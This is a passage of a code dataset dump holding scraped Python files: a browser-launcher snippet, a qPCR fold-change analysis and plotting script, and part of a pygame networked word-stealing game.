y_one_hot_val, batch_size=batch_size),\n validation_steps=len(X_val)/batch_size)","sub_path":"Archived_Scripts/Given_Sample_Code.py","file_name":"Given_Sample_Code.py","file_ext":"py","file_size_in_byte":10576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"140565464","text":"__author__ = 'tusharsappal'\n\nimport webbrowser\n\n## courtesy Python Cook Book Solution 13.15\n## This script launches the web browser and opens the url http://google.com\n\n\ndef launch_web_browser(url):\n\n webbrowser.open_new(url)\n\n\n\n## Replace the url to be opened through the web browser\nlaunch_web_browser(\"http://www.google.com\")","sub_path":"python_scripts/python_cook_book_receipes/utility_scripts_administration/launch_web_browser.py","file_name":"launch_web_browser.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"162671614","text":"import pandas as pd\nfrom pprint import pprint\nimport itertools\nimport numpy as np\nimport os\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport scipy\nimport matplotlib\n\nqpcr_file ='/Users/idriver/RockLab-files/Tcf_Belo-ctrl-090816_all.txt'\nqpcr_df = pd.read_csv(qpcr_file, delimiter= '\\t')\n\nsns.set_context(\"notebook\", font_scale=1.5, rc={\"lines.linewidth\": 2.5})\nfont = {'family' : 'normal',\n 'size' : 19}\nmatplotlib.rc('font', **font)\n\ndef stars(p):\n if p < 0.0001:\n return \"****\"\n elif (p < 0.001):\n return \"***\"\n elif (p < 0.01):\n return \"**\"\n elif (p < 0.05):\n return \"*\"\n else:\n return \"ns\"\n\nsamples = list(set(qpcr_df['Sample Name']))\ntargets = list(set(qpcr_df['Target Name']))\nsample_dict = {}\nindex_list = []\nfor samp in samples:\n target_dict = {}\n delta_ct_actb_dict = {}\n delta_ct_gapdh_dict = {}\n sample_df = qpcr_df[qpcr_df['Sample Name'] == samp]\n for targ in targets:\n target_df = sample_df[(sample_df['Target Name'] == targ)]\n targ_mean = pd.to_numeric(target_df['CT']).mean()\n target_dict[targ] = targ_mean\n index_list.append(samp)\n for targ2 in targets:\n actb_mean = target_dict['Actb']\n gapdh_mean = target_dict['Gapdh']\n if targ2 != 'Actb':\n delta_ct_actb = actb_mean - target_dict[targ2]\n else:\n delta_ct_actb = 0\n if targ2 != 'Gapdh':\n delta_ct_gapdh = gapdh_mean - target_dict[targ2]\n else:\n delta_ct_gapdh = 0\n delta_ct_actb_dict[targ2] = delta_ct_actb\n delta_ct_gapdh_dict[targ2] = delta_ct_gapdh\n sample_dict[samp] = target_dict\n sample_dict['delta_ct_actb_'+samp] = delta_ct_actb_dict\n sample_dict['delta_ct_gapdh_'+samp] = delta_ct_gapdh_dict\ndelta_pairs = []\nfor samp1,samp2 in itertools.permutations(samples,2):\n if samp1 != samp2 and 'Norm' in samp2 and 'Bleo' in samp1 and 'Socs3' not in samp1 and 'Norm2' not in samp2:\n delta_pairs.append((samp1,samp2))\nresults_df = pd.DataFrame.from_dict(sample_dict)\ngene_df_list = []\nfor p in delta_pairs:\n pow_dict = dict(zip(targets,[2 for t in targets]))\n ratio_dict = {'pos_dict_a':sample_dict['delta_ct_actb_'+p[0]],'neg_dict_a':sample_dict['delta_ct_actb_'+p[1]], 'pos_dict_g':sample_dict['delta_ct_gapdh_'+p[0]], 'neg_dict_g':sample_dict['delta_ct_gapdh_'+p[1]], 'pwer':pow_dict}\n\n pair_df = pd.DataFrame.from_dict(ratio_dict)\n by_gene_df = pair_df.transpose()\n new_index_dict ={}\n for i in by_gene_df.index.tolist():\n new_index_dict[i]= i+'_'+p[0]+'_to_'+p[1]\n by_gene_df.rename(new_index_dict, inplace=True)\n gene_df_list.append(by_gene_df)\n pwer_df = pair_df['pwer']\n ratio_df_a = pd.DataFrame(pwer_df.pow(pair_df['pos_dict_a'])/pwer_df.pow(pair_df['neg_dict_a']), columns=[p[0]+'_to_'+p[1]+'_ratio_Actb'])\n ratio_df_g = pd.DataFrame(pwer_df.pow(pair_df['pos_dict_g'])/pwer_df.pow(pair_df['neg_dict_g']), columns=[p[0]+'_to_'+p[1]+'_ratio_Gapdh'])\n\n fc_all = pd.merge(ratio_df_a,ratio_df_g, right_index=True, left_index=True)\n\n all_results = pd.merge(results_df,fc_all, right_index=True, left_index=True)\n results_df = all_results.copy()\nall_gene_df = pd.concat(gene_df_list)\n\n\nplot_df_dict = {}\ntarget_list = results_df.index.tolist()\n\nresults_df.to_csv(os.path.join(os.path.dirname(qpcr_file), 'qpcr_results_'+qpcr_file.split('/')[-1]), sep='\\t')\n\nplot_df_dict['Target'] = []\nplot_df_dict['Ratio Bleo to Saline Control'] = []\nplot_df_dict['Control'] = []\nselected_genes= ['Actb', 'Gapdh', 'Col3a1', 'Col1a2','Acta2','Pdgfra', 'G0s2', 'Tcf21', 'Col14a1']\n\npos_df_a = all_gene_df[all_gene_df.index.map(lambda x: 'pos_dict_a' in x)]\nneg_df_a = all_gene_df[all_gene_df.index.map(lambda x: 'neg_dict_a' in x)]\npos_df_g = all_gene_df[all_gene_df.index.map(lambda x: 'pos_dict_g' in x)]\nneg_df_g = all_gene_df[all_gene_df.index.map(lambda x: 'neg_dict_g' in x)]\nstats_dict = {}\nfor gene in selected_genes:\n stats_dict[gene+'_a'] = scipy.stats.f_oneway(pos_df_a[gene],neg_df_a[gene])\n stats_dict[gene+'_g'] = scipy.stats.f_oneway(pos_df_g[gene],neg_df_g[gene])\nstats_df = pd.DataFrame.from_dict(stats_dict)\n\nratio_df = results_df[[n for n in results_df.columns.values if 'ratio' in n]]\nselected_ratio_df = ratio_df.loc[selected_genes]\nselected_ratio_df.reindex(selected_genes)\nplot_controls = 'Gapdh' #values can be 'Actb' 'Gapdh' or both\n\nfor t in [n for n in selected_ratio_df.columns.values if 'ratio' in n]:\n control_name = t.split('_')[-1]\n if plot_controls == 'Actb':\n if control_name == 'Actb':\n plot_df_dict['Target']= plot_df_dict['Target']+ selected_genes\n plot_df_dict['Ratio Bleo to Saline Control']= plot_df_dict['Ratio Bleo to Saline Control'] +selected_ratio_df[t].tolist()\n plot_df_dict['Control'] = plot_df_dict['Control']+[control_name]*len(selected_genes)\n elif plot_controls == 'Gapdh':\n if control_name == 'Gapdh':\n plot_df_dict['Target']= plot_df_dict['Target']+ selected_genes\n plot_df_dict['Ratio Bleo to Saline Control']= plot_df_dict['Ratio Bleo to Saline Control'] +selected_ratio_df[t].tolist()\n plot_df_dict['Control'] = plot_df_dict['Control']+[control_name]*len(selected_genes)\n elif plot_controls == 'both':\n plot_df_dict['Target']= plot_df_dict['Target']+ selected_genes\n plot_df_dict['Ratio Bleo to Saline Control']= plot_df_dict['Ratio Bleo to Saline Control'] +selected_ratio_df[t].tolist()\n plot_df_dict['Control'] = plot_df_dict['Control']+[control_name]*len(selected_genes)\n\nplot_df = pd.DataFrame.from_dict(plot_df_dict)\nplot_df.to_csv(os.path.join(os.path.dirname(qpcr_file), 'qpcr_plot_df_selected_'+qpcr_file.split('/')[-1]), sep='\\t')\n\nfig, ax = plt.subplots()\nsns.boxplot(x='Target', y='Ratio Bleo to Saline Control', hue = 'Control', data=plot_df, ax = ax)\nadd_on =0\nymax = plot_df['Ratio Bleo to Saline Control'].max()\ny_min = plot_df['Ratio Bleo to Saline Control'].min()\npos = np.arange(len(set(plot_df['Target'])))\nax.yaxis.set_ticks(np.arange(0,ymax+5,1))\nax.set_ylim([0,ymax+1])\nfor tick, label in zip(range(len(set(plot_df['Target']))), plot_df['Target']):\n if plot_controls =='Actb':\n p_value_a = stats_df[label+'_a'][1]\n df_1 = plot_df[(plot_df['Target']==label)&(plot_df['Control']=='Actb')]\n ratio_a = df_1['Ratio Bleo to Saline Control'].mean()\n ax.text(pos[tick], ymax + 1.2, \"%.1f\" % ratio_a,horizontalalignment='center', color='blue')\n ax.text(pos[tick], ymax + abs(ymax - y_min)*0.1, stars(p_value_a),\n horizontalalignment='center',\n verticalalignment='center', color='black')\n elif plot_controls =='Gapdh':\n p_value_g = stats_df[label+'_g'][1]\n df_2 = plot_df[(plot_df['Target']==label)&(plot_df['Control']=='Gapdh')]\n ratio_g = df_2['Ratio Bleo to Saline Control'].mean()\n ax.text(pos[tick], ymax+1.2, \"%.1f\" % ratio_g,horizontalalignment='center', color='blue')\n ax.text(pos[tick], ymax + abs(ymax - y_min)*0.1, stars(p_value_g),\n horizontalalignment='center',\n verticalalignment='center', color='black')\n elif plot_controls =='both':\n df_1 = plot_df[(plot_df['Target']==label)&(plot_df['Control']=='Actb')]\n df_2 = plot_df[(plot_df['Target']==label)&(plot_df['Control']=='Gapdh')]\n p_value_a = stats_df[label+'_a'][1]\n p_value_g = stats_df[label+'_g'][1]\n ratio_a = df_1['Ratio Bleo to Saline Control'].mean()\n ratio_g = df_2['Ratio Bleo to Saline Control'].mean()\n print(df_2)\n ax.text(pos[tick]-0.15, ymax + 1.2, \"%.1f\" % ratio_a,\n horizontalalignment='center', color='blue')\n ax.text(pos[tick], ymax + -0.4 +abs(ymax - y_min)*0.1, stars(p_value_a),\n horizontalalignment='center',\n verticalalignment='center', color='blue')\n ax.text(pos[tick]+0.15, ymax + 1.2, \"%.1f\" % ratio_g,\n horizontalalignment='center', color='green')\n ax.text(pos[tick], ymax +0.2 + abs(ymax - y_min)*0.1, stars(p_value_g),\n horizontalalignment='center',\n verticalalignment='center', color='green')\n\nax.text(pos[tick]+1, ymax + abs(ymax - y_min)*0.1, 'p-value',\n horizontalalignment='center',\n verticalalignment='center', color='black')\nax.text(pos[tick]+1, ymax + 1.2, 'Ratio Mean',\n horizontalalignment='center',\n verticalalignment='center', color='blue')\n\nax.legend_.remove()\n\nplt.show()\n","sub_path":"qpcr3.py","file_name":"qpcr3.py","file_ext":"py","file_size_in_byte":8580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"374813000","text":"import itertools\nimport random\nimport twl\nfrom collections import Counter\nimport time\nfrom network_new import Network # UPDATE\nimport ast\nimport datetime\nfrom itertools import combinations\n\nimport api\n\nimport pygame, sys\nfrom pygame.locals import *\n\nprint_check = True\ntime_check = False\nno_prefix_suffix = True\n\nnot_allowed_prefixes = ['UN', 'RE']\nnot_allowed_suffixes = ['S', 'ED', 'D', 'ES', 'ER', 'R', 'OR', 'ING', 'EST', 'IEST', 'LY', 'TION', 'SION']\n\nword_add_twl = ['acai', 'roo', 'tix']\n\nFPS = 30\nWINDOWWIDTH = 640\nWINDOWHEIGHT = 640\n\n# Colors\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nNAVYBLUE = (60, 60, 100)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\n\nBGCOLOR = WHITE\nTEXTCOLOR = BLACK\n\nflip_delay = 1000 # Delay before flip in ms\nflip_status = ''\n\nletters = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\nletter_freq = {'A': 13, 'B': 3, 'C': 3, 'D': 6, 'E': 18, 'F': 3, 'G': 4, 'H':3, 'I':12, 'J':2, 'K':2, 'L':5, 'M':3, 'N':8, 'O':11, 'P':3, 'Q':2, 'R':9, 'S':6, 'T':9, 'U': 6, 'V':3, 'W':3, 'X':2, 'Y':3, 'Z':2}\nletter_keys = [K_a, K_b, K_c, K_d, K_e, K_d, K_e, K_f, K_g, K_h, K_i, K_j, K_k, K_l, K_m, K_n, K_o, K_p, K_q, K_r, K_s, K_t, K_u, K_t, K_v, K_w, K_x, K_y, K_z]\n\n# ________\n# | LAYOUT |\n# --------\n\n# 'Current'\nfont_current = 'freesansbold.ttf'\nsize_current = 32\ncolor_current = BLACK\nx_current = 10\ny_current = 20\n\n\n# Ready Flip\nfont_flip = 'freesansbold.ttf'\nsize_flip = 20\ncolor_flip = BLACK\nx_flip = 20\ny_flip = 60\n\n# Tiles\nfont_tile = 'freesansbold.ttf'\nsize_tile = 32\ncolor_tile = BLACK\nx_tile_0 = 150\ny_tile_0 = 38\nx_gap_tile = 30\ny_gap_tile = 50\n\n# 'Your Words'\nfont_your = 'freesansbold.ttf'\nsize_your = 32\ncolor_your = BLACK\nx_your = 10\ny_your = 100\ny_gap_your = 50\n\n# Your Words\nfont_words = 'freesansbold.ttf'\nsize_words = 32\ncolor_words = BLACK\nx_words = 10\ny_words = y_your + y_gap_your\nx_gap_words = 150\ny_gap_words = 50\n\n# 'Opponent's Words'\nfont_opp = 'freesansbold.ttf'\nsize_opp = 32\ncolor_opp = BLACK\nx_opp = 300\ny_opp = 100\ny_gap_opp = 50\n\n# Opponent's Words\nfont_opp_words = 'freesansbold.ttf'\nsize_opp_words = 32\ncolor_opp_words = BLACK\nx_opp_words = 300\ny_opp_words = y_opp + y_gap_opp\nx_gap_opp_words = 150\ny_gap_opp_words = 50\n\ncolor_taken = BLUE\n\n# Guess\nfont_guess = 'freesansbold.ttf'\nsize_guess = 32\ncolor_guess = BLACK\nx_guess = 10\ny_guess = 500\n\n# Status\nfont_status = 'freesansbold.ttf'\nsize_status = 24\ncolor_status = BLACK\nx_status = 10\ny_status = 550\n\ndef numwords_to_fontsize(numwords):\n if numwords <= 6:\n return int(size_words/1.25), int(y_gap_words/1.25)\n elif 6 < numwords <= 10:\n return int(size_words / 1.75), int(y_gap_words / 1.75)\n elif 10 < numwords <= 20:\n return int(size_words / 2), int(y_gap_words / 2)\n elif 20 < numwords <= 50:\n return int(size_words / 3), int(y_gap_words / 3)\n\ndef numtiles_to_fontsize(numtiles):\n if numtiles <= 10:\n return size_tile, y_gap_tile, x_gap_tile\n elif 10 < numtiles <= 40:\n return int(size_tile / 1.5), int(y_gap_tile / 1.5), int(x_gap_tile / 1.5)\n elif 40 < numtiles <= 60:\n return int(size_tile / 2), int(y_gap_tile / 2), int(x_gap_tile / 2)\n elif 60 < numtiles <= 144:\n return int(size_tile / 4), int(y_gap_tile / 4), int(x_gap_tile / 4)\n\ndef try_parsing_date(text):\n for fmt in ('%Y-%m-%d %H:%M:%S.%f', '%Y-%m-%d %H:%M:%S'):\n try:\n return datetime.datetime.strptime(text, fmt)\n except ValueError:\n pass\n raise ValueError('no valid date format found')\n\nclass banana(object):\n def __init__(self):\n\n # -------- #\n # BANANA #\n # -------- #\n\n\n self.take_dict = {'new_word': '', 'etyms_new_word': '', 'take_time': 0,\n 'used_tiles': [], 'self_taken_words': [], 'opp_taken_words': [],\n 'self_taken_is':[], 'opp_taken_is':[]}\n\n self.take_dict_past = {'new_word': '', 'etyms_new_word': '', 'take_time': 0,\n 'used_tiles': [], 'self_taken_words': [], 'opp_taken_words': [],\n 'self_taken_is':[], 'opp_taken_is':[]}\n\n self.flip_dict = {'flip_status': '', 'flip_waiting': False,\n 'scheduled_flip': 0}\n\n\n # Game state\n self.tiles = []\n self.current = []\n self.playerwords = {}\n self.playerwords_list = []\n self.player2words = {}\n self.player2words_list = []\n self.guess = ''\n self.previous_guess = ''\n self.status = ''\n self.last_update = 0\n self.player2_last_update = 0\n self.mode = 'waiting'\n self.frozen = False\n self.take_waiting = False\n self.i_flipped = False\n\n # Previous game state\n self.tiles_past = []\n self.current_past = []\n self.playerwords_past = {}\n self.playerwords_list_past = []\n self.player2words_past = {}\n self.player2words_list_past = []\n\n # Things in flip timer dict\n \"\"\"\n self.flip_waiting = False\n self.time_flip = pygame.time.get_ticks()\n \"\"\"\n\n # things in the take dict\n \"\"\"\n self.middle_used = []\n self.taken_word = \"\\'\\'\"\n self.take_start_time = 0\n self.used_tiles = []\n \"\"\"\n\n # not added to a dict\n self.player2current = []\n self.player2tiles = []\n self.take_end_time = 0\n\n self.who_took = ''\n self.taken_i = -1\n self.new_word_i = -1\n self.new_word = ''\n\n # Graphics\n self.fontObj_current = pygame.font.Font(font_current, size_current)\n self.fontObj_tile = pygame.font.Font(font_tile, size_tile)\n self.fontObj_your = pygame.font.Font(font_your, size_your)\n self.fontObj_words = pygame.font.Font(font_words, size_words)\n self.fontObj_guess = pygame.font.Font(font_guess, size_guess)\n self.fontObj_status = pygame.font.Font(font_status, size_status)\n self.fontObj_flip = pygame.font.Font(font_flip, size_flip)\n self.fontObj_opp = pygame.font.Font(font_your, size_your)\n self.fontObj_opp_words = pygame.font.Font(font_words, size_words)\n\n self.currentSurfObj = self.fontObj_current.render('Current: ', True, color_current)\n self.tilesSurfObj_list = []\n self.yourSurfObj = self.fontObj_your.render('Your Words: ', True, color_your)\n self.playerwordsSurfObj_list = []\n self.oppSurfObj = self.fontObj_opp.render('Opponent\\'s Words: ', True, color_opp)\n self.player2wordsSurfObj_list = []\n self.guessSurfObj = self.fontObj_guess.render('Take: ' + self.guess, True, color_guess)\n self.statusSurfObj = self.fontObj_status.render(self.status, True, color_status)\n self.flipSurfObj = self.fontObj_flip.render(self.flip_dict['flip_status'], True, color_flip)\n\n self.graphics_to_update = []\n\n self.y_gap_words = y_gap_words\n self.y_gap_opp_words = y_gap_opp_words\n self.x_gap_tile = x_gap_tile\n self.y_gap_tile = y_gap_tile\n\n\n # Initialization variables\n self.game_start_time = 0\n self.host = False\n self.seed_set = False\n self.seed = 0\n\n print(\"Initializing network\")\n # Network\n self.net = Network()\n\n print(\"Finished initializing network\")\n\n # For time checks\n self.time_dict = {'loop': 0, 'send_data': 0, 'take': 0, 'update_graphics': 0,\n 'display_graphics': 0, 'send_parse': 0, 'update_players': 0}\n\n self.last_type = time.time() - 1\n\n self.same_root_word = ''\n\n print(\"gonna do first server update\")\n # Perform an initial server update\n self.get_server_update()\n print(\"finished first server update\")\n\n # If you receive a invalid seed, there's no opponent and you should set the seed yourself\n # If you do receive a valid seed, there's already an opponent and take their seed\n if self.seed_recv < 1:\n self.seed = random.randint(1, 100000)\n self.seed_set = True\n else:\n self.seed = self.seed_recv\n\n # Set the tiles and shuffle them\n for letter in letters:\n self.tiles = self.tiles + list(itertools.repeat(letter, letter_freq[letter]))\n random.shuffle(self.tiles)\n\n def send_data(self):\n if time_check:\n start_time = time.time()\n # print(f\"NET ID: {self.net.id}\")\n data = str(self.net.id) + \"|\" + str(self.seed) + \"|\" + str(self.last_update) + \"|\" + str(self.take_dict) + \"|\" + str(self.flip_dict)\n # print(f\"DATA TO SEND: {data}\")\n reply = self.net.send(data)\n # print(f\"DATA RECEIVED: {reply}\")\n\n if time_check:\n end_time = time.time()\n self.time_dict['send_data'] = end_time - start_time\n\n return reply\n\n @staticmethod\n def parse_data(data):\n try:\n # print(f\"DATA TO PARSE: {data}\")\n split = data.split('|')\n net_id = ast.literal_eval(split[0])\n seed_recv = ast.literal_eval(split[1])\n last_update_recv = ast.literal_eval(split[2])\n take_dict_recv = ast.literal_eval(split[3])\n flip_timer_dict_recv = ast.literal_eval(split[4])\n\n return net_id, seed_recv, last_update_recv, take_dict_recv, flip_timer_dict_recv\n except:\n return -1, 0, {}, {}, {}\n\n def flip(self):\n if not self.tiles:\n self.status = f\"No more tiles! Your score: {sum([len(i) for i in self.playerwords_list])}, Opponent's score: {sum([len(i) for i in self.player2words_list])}\"\n self.graphics_to_update = self.graphics_to_update + ['status']\n return None\n\n # self.last_update = time.time()\n last = self.tiles.pop()\n self.current.append(last)\n self.flip_dict['flip_status'] = ''\n self.flip_dict['flip_waiting'] = False\n\n self.graphics_to_update = self.graphics_to_update + ['tiles', 'flip']\n\n def __cleared_take_dict(self):\n cleared_dict = ({'new_word': '', 'etyms_new_word': '', 'take_time': 0,\n 'used_tiles': [], 'self_taken_words': [], 'opp_taken_words': [],\n 'self_taken_is': [], 'opp_taken_is': []}).copy()\n\n return cleared_dict\n\n def __is_cleared(self, dict):\n return dict['take_time'] == 0\n\n def __superset(self, word1, word2, strict = False):\n # Can word 1 take word 2?\n word1_counter = Counter(word1)\n word2_counter = Counter(word2)\n\n if strict:\n return (word1_counter - word2_counter and not (word2_counter - word1_counter))\n else:\n return (word1_counter - word2_counter and not(word2_counter - word1_counter)) or (not (word1_counter - word2_counter) and not (word2_counter - word1_counter))\n\n def __subtract(self, word1, word2):\n # Subtract word2 from word1 (e.g. 'test' - 'tst' = 'e')\n\n list1 = list(word1)\n for letter in word2:\n list1.remove(letter)\n\n # Turn list into string\n str = ''\n str = str.join(list1)\n\n return str\n\n def __check_steal(self, candidate, etyms_candidate):\n # Check whether a steal happens\n # Input a candidate word (i.e. guess), its merriam stripped version,\n # a dictionary with the words to take from (plus their merriam stripped versions) and\n # a Boolean indicating whether we're checking a steal from the opponent\n\n # Returns whether stolen, what kind of steal or error, the taken word, and index of taken word\n\n # Set event_type to 'tiles' arbitrarily\n error_type = 'tiles'\n\n # Dictionary with all the words that need middle tiles, to check if multi-word steal is possible\n # Each value is a tuple (index, bool indicating if self not opp, word_etym)\n lacks_middle_tiles = {}\n\n # First check if can steal opponent's word\n for i, word in enumerate(self.player2words_list):\n # First, check if candidate is a superset of the current word\n if self.__superset(candidate, word, strict=True):\n\n # Then, check if the tiles needed to make candidate are in the middle\n used_tiles = self.__subtract(candidate, word)\n if not self.__superset(self.current, used_tiles):\n if error_type != 'trivial':\n error_type = 'tiles'\n lacks_middle_tiles[word] = (i, False, self.player2words[word])\n else:\n etyms_word = self.player2words[word]\n\n try:\n # Check for any common roots. If etymonline returns nothing, then assume there are no\n # common roots\n root_overlap = any(x in etyms_candidate for x in etyms_word)\n except TypeError:\n root_overlap = False\n\n if root_overlap:\n self.same_root_word = word\n self.root = set(etyms_candidate).intersection(etyms_word).pop()\n error_type = 'trivial'\n else:\n taken_word = word\n taken_i = i\n return True, used_tiles, [], [taken_word], [], [taken_i]\n\n # Check if can steal own word\n for i, word in enumerate(self.playerwords_list):\n # First, check if candidate is a superset of the current word\n if self.__superset(candidate, word, strict=True):\n\n # Then, check if the tiles needed to make candidate are in the middle\n used_tiles = self.__subtract(candidate, word)\n if not self.__superset(self.current, used_tiles):\n if error_type != 'trivial':\n error_type = 'tiles'\n lacks_middle_tiles[word] = (i, True, self.playerwords[word])\n else:\n etyms_word = self.playerwords[word]\n\n try:\n # Check for any common roots. If etymonline returns nothing, then assume there are no\n # common roots\n root_overlap = any(x in etyms_candidate for x in etyms_word)\n except TypeError:\n root_overlap = False\n\n if root_overlap:\n self.same_root_word = word\n self.root = set(etyms_candidate).intersection(etyms_word).pop()\n error_type = 'trivial'\n else:\n taken_word = word\n taken_i = i\n return True, used_tiles, [taken_word], [], [taken_i], []\n\n # Check if can steal middle word\n if self.__superset(self.current, candidate, strict=False):\n return True, list(candidate), [], [], [], []\n\n # Check for multi-word steals\n if len(lacks_middle_tiles) >= 2:\n for word1, word2 in combinations(lacks_middle_tiles, 2):\n if self.__superset(candidate, word1 + word2, strict=False):\n\n # Then, check if the tiles needed to make candidate are in the middle\n used_tiles = self.__subtract(candidate, word1 + word2)\n if self.__superset(self.current, used_tiles):\n etyms_word1 = lacks_middle_tiles[word1][2]\n etyms_word2 = lacks_middle_tiles[word2][2]\n\n try:\n # Check for any common roots. If etymonline returns nothing, then assume there are no\n # common roots\n root_overlap1 = any(x in etyms_candidate for x in etyms_word1)\n except TypeError:\n root_overlap1 = False\n try:\n root_overlap2 = any(x in etyms_candidate for x in etyms_word2)\n except TypeError:\n root_overlap2 = False\n\n if root_overlap1:\n self.same_root_word = word1\n self.root = set(etyms_candidate).intersection(etyms_word1).pop()\n error_type = 'trivial'\n elif root_overlap2:\n self.same_root_word = word2\n self.root = set(etyms_candidate).intersection(etyms_word2).pop()\n error_type = 'trivial'\n\n else:\n self_taken_words = [word for word in [word1, word2] if lacks_middle_tiles[word][1]]\n opp_taken_words = [word for word in [word1, word2] if not lacks_middle_tiles[word][1]]\n\n self_taken_is = [lacks_middle_tiles[word][0] for word in self_taken_words]\n opp_taken_is = [lacks_middle_tiles[word][0] for word in opp_taken_words]\n\n return True, used_tiles, self_taken_words, opp_taken_words, self_taken_is, opp_taken_is\n\n if error_type == 'trivial':\n self.status = \"Same root! \" + f\"({self.same_root_word} and {candidate} share root {self.root})\"\n self.graphics_to_update = self.graphics_to_update + ['status', 'guess']\n return False, [], [], [], []\n elif error_type == 'tiles':\n self.status = \"Tiles aren't there! \" + f\"({candidate})\"\n self.graphics_to_update = self.graphics_to_update + ['status', 'guess']\n return False, [], [], [], []\n\n def take(self, candidate):\n self.take_dict['used_tiles'] = []\n\n if time_check:\n start_time = time.time()\n\n self.take_dict['take_time'] = time.time()\n\n # First check if has 3 letters\n if len(candidate) < 3:\n self.status = \"Word is too short! \" + f\"({candidate})\"\n self.guess = ''\n self.graphics_to_update = self.graphics_to_update + ['status', 'guess']\n return None\n\n # Then check if a word\n if len(candidate) < 10:\n candidate_lower = candidate.lower()\n is_word = twl.check(candidate_lower) or candidate_lower in word_add_twl\n else:\n is_word = api.get_word_data(candidate)\n if not is_word:\n # self.__display_text(\"Not a word!\", 200, 400)\n self.status = \"Not a word! \" + f\"({candidate})\"\n self.guess = ''\n self.graphics_to_update = self.graphics_to_update + ['status', 'guess']\n return None\n\n # If no prefixes and suffixes rule, check that\n if no_prefix_suffix:\n has_prefix_suffix, prefix, suffix = api.get_prefix_suffix(candidate)\n # print(f\"Stuff: {has_prefix_suffix}, {prefix}, {suffix}\")\n # print(f\"{prefix in not_allowed_prefixes}, {suffix in not_allowed_suffixes}\")\n if has_prefix_suffix and (prefix in not_allowed_prefixes or suffix in not_allowed_suffixes):\n self.status = \"Prefix / suffix not allowed!\"\n self.guess = ''\n self.graphics_to_update = self.graphics_to_update + ['status', 'guess']\n return None\n\n etyms_candidate = api.get_etym(candidate)\n\n is_taken, used_tiles, self_taken_words, opp_taken_words, self_taken_is, opp_taken_is = self.__check_steal(candidate, etyms_candidate)\n\n if is_taken:\n self.take_dict['new_word'] = candidate\n self.take_dict['etyms_new_word'] = etyms_candidate\n self.take_dict['take_time'] = self.take_dict['take_time']\n self.take_dict['used_tiles'] = used_tiles\n self.take_dict['self_taken_words'] = self_taken_words\n self.take_dict['opp_taken_words'] = opp_taken_words\n self.take_dict['self_taken_is'] = self_taken_is\n self.take_dict['opp_taken_is'] = opp_taken_is\n\n self.take_waiting = True\n self.take_waiting_time = time.time()\n\n # Make a copy of current game state in case we need to backtrack\n self.tiles_past = self.tiles.copy()\n self.current_past = self.current.copy()\n self.playerwords_past = self.playerwords.copy()\n self.playerwords_list_past = self.playerwords_list.copy()\n self.player2words_past = self.player2words.copy()\n self.player2words_list_past = self.player2words_list.copy()\n\n if self.mode == 'solo':\n self.update_take('self', self.take_dict)\n\n\n self.guess = ''\n if time_check:\n end_time = time.time()\n self.time_dict['take'] = end_time - start_time\n\n def update_take(self, robber, take_dict):\n for letter in take_dict['used_tiles']:\n self.current.remove(letter)\n\n if robber == 'self':\n self.last_update = take_dict['take_time']\n\n self.playerwords.update({take_dict['new_word']: take_dict['etyms_new_word']})\n if take_dict['self_taken_is']:\n self.playerwords_list[take_dict['self_taken_is'][0]] = take_dict['new_word']\n else:\n self.playerwords_list.append(take_dict['new_word'])\n\n # Delete any taken words from own dictionary and list\n for j in range(1, len(take_dict['self_taken_is'])):\n del self.playerwords_list[take_dict['self_taken_is'][j]]\n\n for word in take_dict['self_taken_words']:\n if word not in self.playerwords_list:\n del self.playerwords[word]\n\n # Delete any taken words from opp's dictionary and list\n for j in range(len(take_dict['opp_taken_is'])):\n del self.player2words_list[take_dict['opp_taken_is'][j]]\n\n for word in take_dict['opp_taken_words']:\n if word not in self.player2words_list:\n del self.player2words[word]\n\n if take_dict['self_taken_words'] or take_dict['opp_taken_words']:\n taken_words_string = ' '.join(\n str(take_dict['self_taken_words'] + take_dict['opp_taken_words']).split(\"'\")[1:-1])\n self.status = \"Success! \" + f\"({taken_words_string} -> {take_dict['new_word']})\"\n else:\n self.status = \"Success! \" + f\"({take_dict['new_word']} from the middle)\"\n\n else:\n self.last_update = self.take_dict['take_time']\n\n self.player2words.update({take_dict['new_word']: take_dict['etyms_new_word']})\n if take_dict['opp_taken_is']:\n self.player2words_list[take_dict['opp_taken_is'][0]] = take_dict['new_word']\n else:\n self.player2words_list.append(take_dict['new_word'])\n\n # Delete any taken words from own dictionary and list\n for j in range(0, len(take_dict['self_taken_is'])):\n del self.playerwords_list[take_dict['self_taken_is'][j]]\n\n for word in take_dict['self_taken_words']:\n if word not in self.playerwords_list:\n del self.playerwords[word]\n\n # Delete any taken words from opp's dictionary and list\n for j in range(1, len(take_dict['opp_taken_is'])):\n del self.player2words_list[take_dict['opp_taken_is'][j]]\n\n for word in take_dict['opp_taken_words']:\n if word not in self.player2words_list:\n del self.player2words[word]\n\n if take_dict['self_taken_words'] or take_dict['opp_taken_words']:\n taken_words_string = ' '.join(\n str(take_dict['self_taken_words'] + take_dict['opp_taken_words']).split(\"'\")[1:-1])\n self.status = f\"Opponent took {taken_words_string} with {take_dict['new_word']}!\"\n else:\n self.status = f\"Opponent took {take_dict['new_word']} from the middle!\"\n\n self.graphics_to_update = self.graphics_to_update + ['tiles', 'playerwords', 'player2words',\n 'status', 'guess']\n\n self.graphics_to_update = self.graphics_to_update + ['tiles', 'playerwords', 'player2words',\n 'status', 'guess']\n\n self.who_took = robber\n self.new_word = take_dict['new_word']\n\n def update_graphics(self):\n if time_check:\n start_time = time.time()\n\n if 'flip' in self.graphics_to_update:\n self.flipSurfObj = self.fontObj_flip.render(self.flip_dict['flip_status'], True, color_flip)\n\n\n if 'tiles' in self.graphics_to_update:\n self.tilesSurfObj_list = []\n\n size_tiles, self.y_gap_tile, self.x_gap_tile = numtiles_to_fontsize(len(self.current))\n self.fontObj_tile = pygame.font.Font(font_words, size_tiles)\n\n for tile in self.current:\n self.tilesSurfObj_list.append(self.fontObj_tile.render(tile, True, color_tile))\n\n if 'playerwords' in 